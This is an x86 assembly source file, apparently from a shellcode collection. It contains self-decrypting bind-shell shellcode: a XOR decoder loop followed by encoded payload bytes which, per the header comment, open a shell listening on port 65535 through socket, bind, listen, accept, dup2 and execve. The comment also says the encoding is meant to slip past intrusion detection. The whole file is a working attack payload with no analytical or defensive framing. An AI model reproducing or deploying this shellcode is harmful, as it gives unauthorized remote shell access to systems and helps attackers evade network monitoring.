/* Self decryption shellcode with a simple XOR computation (no need more for antiIDS) with socket , listen , bind , accept , dup2 , execve bindshell on 0.0.0.0:65535 written in AT&T syntax x86 assembler beck@math.co.ro */ .globl main jmp string /* We start jumping to "string" to load stack address of the encoded data */ main: pop %esi /* pop from top of stack the address of the encoded data */ movb $228,%cl /* size of encoded data - 4 because we want to start reading 4 bytes in "finalbyte_addr -4" */ add %ecx,%esi /* addition to the address of encoded data because we want to read from end to begin */ movl $0x5f5f5f5f,%ecx /* We used 0x5f to encode data but we are gonna decrypt in 32 bit blocks. */ movb $58,%dl /* 228/4 = 58 iterations for decoding all the encrypted data in blocks */ movl (%esi),%ebx /* copy 32 bits from the adress that esi points to %ebx */ sub $4,%esi /* substract 4 bytes of the current address of %esi to repeat the same step of decoding */ xor %ecx,%ebx /* decode %ebx using %ecx ($0x5f5f5f5f) computing an XOR */ push %ebx /* we push to the stack the value that we decoded */ inc %eax /* increment of the counter */ cmp %eax,%edx /* compare that the counter is not 58 (max iterations using that encoded block) */ je memshell /* if we finished (if eax=edx) we jump to memshell */ jmp main+12 /* else jmp to main+12 [movl (%esi),%ebx] */ memshell: jmp *%esp /* jump to the stack pointer and is supposed to have the last byte we decoded */ string: xor %eax,%eax /* clean registers */ xor %ebx,%ebx xor %ecx,%ecx xor %edx,%edx call main /* if we are here then we jump to main and we need to pop immediatly to a register to load the */ /* current address */ .ascii "\x6e\x9f\x6e\x84\x6e\x8d\xdc\xb3\x50\xd6\xbe\xef\x39\xdf\x9c\x5e\x99\x5e\x5d\x99" .ascii "\x1e\x5b\x5e\xd6\x0e\x57\x92\xdf\xdc\x9b\x50\xd6\x98\x0d\xd6\x66\x6e\x9f\xef\x39" .ascii "\x6e\x84\xec\x5d\xdc\xb3\x7f\xd6\xbd\x99\x5d\x5d\x39\x98\x1d\x5d\xa0\xa0\x6e\xa9" .ascii "\xd6\x2d\x5b\xd2\x75\xd6\x36\x5b\x99\x1e\x57\x4f\x92\xdf\xdc\x9b\x7f\x6e\x9f\xef" .ascii "\x39\xdc\xb3\x57\xd6\xbe\x6e\x84\xec\x5b\xd6\x66\x99\x1e\x5b\x55\x92\xdf\xdc\x9b" .ascii "\x57\xdc\xb3\x6f\xd6\xbe\x6e\x9f\xef\x39\x6e\x84\xec\x5a\xd6\x66\xd6\x36\x5b\xdc" .ascii "\x9b\x6f\xdc\xb3\x57\xd6\xbd\x99\x5d\x4f\xd6\xa1\xd2\x65\xd6\x26\x57\x92\xdf\x37" .ascii "\x33\x33\x61\xa0\x37\x63\x2c\x37\x3a\xd6\x9c\x6e\x9f\xd7\x1b\x7b\x58\x6e\x8d\xef" .ascii "\x5b\xd6\xbe\xed\x57\x92\xdf\x6e\x9f\xef\x60\x6e\x96\xee\x5d\x92\xdf\x6e\x9f\xef" .ascii "\x60\x6e\x96\xee\x5e\x92\xdf\x6e\x9f\xef\x60\x6e\x96\x92\xdf\x6e\x9f\x6e\x84\xef" .ascii "\x48\x92\xdf\x37\x70\x2c\x37\xa0\x37\x70\x3d\x36\x31\x6e\x9f\xd7\x1b\x7b\x58\xd6" .ascii "\xbc\x0f\x0c\xd6\xbe\xd6\x9d\xef\x54\x92\xdf\xcf"